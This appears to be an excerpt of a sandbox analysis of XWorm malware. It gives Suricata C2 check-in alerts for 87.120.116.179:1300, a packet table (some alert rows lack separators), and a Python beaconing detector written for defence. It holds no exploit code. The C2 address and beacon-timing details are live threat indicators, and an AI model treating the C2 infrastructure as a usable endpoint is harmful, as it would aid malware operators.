2025-01-08T16:04:02.119378+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:04:02.121338+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:04:12.201753+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:04:12.204105+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:04:16.264450+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:04:16.264450+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:04:16.870901+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:04:16.881663+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:04:17.371295+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:04:17.389756+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:04:18.689405+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:04:18.696855+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:04:22.603185+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:04:22.613852+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:04:22.707431+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:04:22.718825+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
2025-01-08T16:04:22.812462+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 87.120.116.179:1300 | 192.168.2.9:49757 | TCP
2025-01-08T16:04:22.820238+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9:49757 | 87.120.116.179:1300 | TCP
                            2025-01-08T16:04:22.914038+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:22.921977+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:25.762894+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:25.764835+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:37.416768+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:37.430720+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:38.583436+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:38.585572+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:40.068279+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:40.070225+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:46.615189+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:46.615189+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:48.636507+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:48.639685+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:48.735921+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:48.744672+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:50.307584+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:50.309402+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:53.838493+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:53.841621+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:53.935124+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:53.941337+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:54.010342+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:54.104400+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:54.106204+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:54.201684+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:54.207001+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:54.295618+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:04:54.299413+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:05:00.072731+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:05:00.073653+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
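The Suricata alerts above identify the session to 87.120.116.179:1300 by XWorm's prefix bytes; the packet table that follows shows the same session's timing. The server pushes an unsolicited packet every 30 seconds (the packets behind the "CnC PING Command Inbound M2" alerts), and the client opens most of its own exchanges about 10 to 12 seconds apart. The Python below is an added example, not code from the Joe Sandbox report or from XWorm, that profiles that periodicity from an excerpt of the packet rows: it separates unsolicited packets from replies with a quiet-gap heuristic, then measures the dominant inter-arrival period. The 0.3 s quiet gap, the 1 s rounding bucket and the beaconing thresholds are assumptions chosen for this capture; the sample rows are copied from the table below and deliberately include the server reply at 16:02:54 that arrives 1.2 s after the client's packet, which the heuristic misclassifies as unsolicited and which is why the detector reports a share instead of requiring every interval to match.

```python
import re
from collections import Counter
from datetime import datetime

# Constructed sample: rows excerpted from the TCP packet table of this report
# (timestamp, source port, dest port, source IP, dest IP), pipe-separated here.
# 192.168.2.9 is the sandbox VM, 87.120.116.179:1300 the XWorm C2.
PACKETS = """\
Jan 8, 2025 16:01:16.242604017 CET|1300|49757|87.120.116.179|192.168.2.9
Jan 8, 2025 16:01:16.288450003 CET|49757|1300|192.168.2.9|87.120.116.179
Jan 8, 2025 16:01:46.243778944 CET|1300|49757|87.120.116.179|192.168.2.9
Jan 8, 2025 16:01:46.288362026 CET|49757|1300|192.168.2.9|87.120.116.179
Jan 8, 2025 16:02:15.292403936 CET|49757|1300|192.168.2.9|87.120.116.179
Jan 8, 2025 16:02:15.297347069 CET|1300|49757|87.120.116.179|192.168.2.9
Jan 8, 2025 16:02:15.489398956 CET|1300|49757|87.120.116.179|192.168.2.9
Jan 8, 2025 16:02:15.497762918 CET|49757|1300|192.168.2.9|87.120.116.179
Jan 8, 2025 16:02:16.258224964 CET|1300|49757|87.120.116.179|192.168.2.9
Jan 8, 2025 16:02:16.304028034 CET|49757|1300|192.168.2.9|87.120.116.179
Jan 8, 2025 16:02:46.232947111 CET|1300|49757|87.120.116.179|192.168.2.9
Jan 8, 2025 16:02:46.290880919 CET|49757|1300|192.168.2.9|87.120.116.179
Jan 8, 2025 16:02:53.663717031 CET|49757|1300|192.168.2.9|87.120.116.179
Jan 8, 2025 16:02:53.668664932 CET|1300|49757|87.120.116.179|192.168.2.9
Jan 8, 2025 16:02:54.884571075 CET|1300|49757|87.120.116.179|192.168.2.9
Jan 8, 2025 16:02:54.888266087 CET|49757|1300|192.168.2.9|87.120.116.179
Jan 8, 2025 16:03:15.667649031 CET|49757|1300|192.168.2.9|87.120.116.179
Jan 8, 2025 16:03:15.672600985 CET|1300|49757|87.120.116.179|192.168.2.9
Jan 8, 2025 16:03:15.841576099 CET|1300|49757|87.120.116.179|192.168.2.9
Jan 8, 2025 16:03:15.845022917 CET|49757|1300|192.168.2.9|87.120.116.179
Jan 8, 2025 16:03:16.234270096 CET|1300|49757|87.120.116.179|192.168.2.9
Jan 8, 2025 16:03:16.295238972 CET|49757|1300|192.168.2.9|87.120.116.179
Jan 8, 2025 16:03:46.241774082 CET|1300|49757|87.120.116.179|192.168.2.9
Jan 8, 2025 16:03:46.289113045 CET|49757|1300|192.168.2.9|87.120.116.179
Jan 8, 2025 16:04:16.264450073 CET|1300|49757|87.120.116.179|192.168.2.9
Jan 8, 2025 16:04:16.320012093 CET|49757|1300|192.168.2.9|87.120.116.179
Jan 8, 2025 16:04:46.615189075 CET|1300|49757|87.120.116.179|192.168.2.9
Jan 8, 2025 16:04:46.664670944 CET|49757|1300|192.168.2.9|87.120.116.179
"""

ROW_RE = re.compile(
    r"^(?P<ts>\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d{9}) CET\|"
    r"(?P<sport>\d+)\|(?P<dport>\d+)\|(?P<src>[\d.]+)\|(?P<dst>[\d.]+)$"
)


def parse_rows(text):
    """Parse the pipe-separated rows into (timestamp, src, sport, dst, dport), oldest first."""
    pkts = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        # strptime's %f accepts at most 6 fractional digits: drop the nanosecond tail
        ts = datetime.strptime(m["ts"][:-3], "%b %d, %Y %H:%M:%S.%f")
        pkts.append((ts, m["src"], int(m["sport"]), m["dst"], int(m["dport"])))
    return sorted(pkts, key=lambda p: p[0])


def initiated_by(pkts, sender, receiver, quiet=0.3):
    """Timestamps of sender->receiver packets that are not replies, i.e. not preceded by a
    receiver->sender packet within `quiet` seconds. Assumption for this capture: replies
    and ACKs follow the packet they answer within about 5 ms to 200 ms."""
    last_from_peer = None
    out = []
    for ts, src, _sport, dst, _dport in pkts:
        if src == receiver and dst == sender:
            last_from_peer = ts
        elif src == sender and dst == receiver:
            if last_from_peer is None or (ts - last_from_peer).total_seconds() > quiet:
                out.append(ts)
    return out


def beacon_profile(times, bucket=1.0):
    """Inter-arrival deltas of `times`, the dominant period (rounded to `bucket` seconds)
    and the share of deltas falling in it; a stray packet only dilutes the share."""
    deltas = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    if not deltas:
        return None
    periods = Counter(round(d / bucket) * bucket for d in deltas)
    period, hits = periods.most_common(1)[0]
    return {"count": len(times), "period": period, "share": hits / len(deltas), "deltas": deltas}


def is_beaconing(profile, min_count=4, min_share=0.6):
    """Flag a peer that keeps one fixed period for most of its unsolicited packets."""
    return profile is not None and profile["count"] >= min_count and profile["share"] >= min_share


if __name__ == "__main__":
    pkts = parse_rows(PACKETS)
    prof = beacon_profile(initiated_by(pkts, "87.120.116.179", "192.168.2.9"))
    print(f"server-initiated packets: {prof['count']}, period {prof['period']:.0f} s, "
          f"share {prof['share']:.2f}, beaconing={is_beaconing(prof)}")
```

On this excerpt the server side yields 9 unsolicited packets with a dominant period of 30 s at a share of 0.75 (6 of 8 intervals; the misclassified 16:02:54 reply splits one 30 s interval into 8.7 s and 21.3 s). The same call with the roles swapped, initiated_by(pkts, "192.168.2.9", "87.120.116.179"), profiles the client's own check-ins, which are too few in this excerpt to qualify but recur every 10 to 12 seconds across the full table. A network-side beaconing rule should key on both cadences, in addition to the static 87.120.116.179:1300 indicator, since the port and address change between XWorm builds while the timing is a property of the client loop.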
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 8, 2025 16:01:01.042848110 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:01:01.047734022 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:01:01.047868013 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:01:01.362397909 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:01:01.367243052 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:01:11.764056921 CET | 54647 | 53 | 192.168.2.9 | 1.1.1.1
Jan 8, 2025 16:01:11.768903971 CET | 53 | 54647 | 1.1.1.1 | 192.168.2.9
Jan 8, 2025 16:01:11.768960953 CET | 54647 | 53 | 192.168.2.9 | 1.1.1.1
Jan 8, 2025 16:01:11.773838997 CET | 53 | 54647 | 1.1.1.1 | 192.168.2.9
Jan 8, 2025 16:01:12.229613066 CET | 54647 | 53 | 192.168.2.9 | 1.1.1.1
Jan 8, 2025 16:01:12.234654903 CET | 53 | 54647 | 1.1.1.1 | 192.168.2.9
Jan 8, 2025 16:01:12.234718084 CET | 54647 | 53 | 192.168.2.9 | 1.1.1.1
Jan 8, 2025 16:01:12.903932095 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:01:12.908720970 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:01:13.077800989 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:01:13.127851009 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:01:13.132671118 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:01:16.242604017 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:01:16.288450003 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:01:24.445365906 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:01:24.450229883 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:01:24.618804932 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:01:24.620769978 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:01:24.625576019 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:01:35.991791964 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:01:35.996840954 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:01:36.166776896 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:01:36.170006990 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:01:36.174969912 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:01:46.243778944 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:01:46.288362026 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:01:47.538767099 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:01:47.543596983 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:01:47.713242054 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:01:47.714831114 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:01:47.719685078 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:01:59.069865942 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:01:59.074745893 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:01:59.244040012 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:01:59.246665955 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:01:59.251744032 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:09.602603912 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:09.607371092 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:09.782193899 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:09.784370899 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:09.789140940 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:10.179303885 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:10.184289932 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:10.353230953 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:10.362629890 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:10.367495060 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:13.195081949 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:13.199969053 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:13.370500088 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:13.374062061 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:13.378915071 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:15.292403936 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:15.297347069 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:15.489398956 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:15.497762918 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:15.502652884 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:16.258224964 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:16.304028034 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:16.835947037 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:16.840920925 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:17.034068108 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:17.035854101 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:17.040674925 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:28.382493019 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:28.387362003 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:28.556337118 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:28.557878971 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:28.562659025 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:34.413880110 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:34.418831110 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:34.587963104 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:34.590605974 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:34.595738888 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:36.080432892 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:36.085366011 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:36.254498005 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:36.258426905 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:36.263319016 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:42.288702965 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:42.293551922 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:42.464648962 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:42.466617107 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:42.471446037 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:44.601273060 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:44.606112957 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:44.616879940 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:44.621673107 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:44.663817883 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:44.668711901 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:44.695091963 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:44.699887037 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:44.860549927 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:44.862386942 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:44.867201090 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:44.908106089 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:44.909885883 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:44.955559969 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:44.955791950 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:44.957595110 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:44.962335110 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:45.050925970 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:45.052850962 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:45.057598114 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:45.179826021 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:45.184638977 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:45.375711918 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:45.382678032 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:45.387525082 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:46.232947111 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:46.290880919 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:53.663717031 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:53.668664932 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:54.884571075 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:02:54.888266087 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:02:54.893151999 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:03.023283005 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:03.028119087 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:03.054666996 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:03.059546947 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:03.197868109 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:03.199865103 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:03.204675913 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:03.293292046 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:03.295087099 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:03.300000906 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:13.210721016 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:13.215696096 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:13.388453007 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:13.395073891 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:13.399909973 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:15.667649031 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:15.672600985 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:15.841576099 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:15.845022917 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:15.849805117 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:16.234270096 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:16.295238972 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:18.507749081 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:18.512650967 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:18.732295990 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
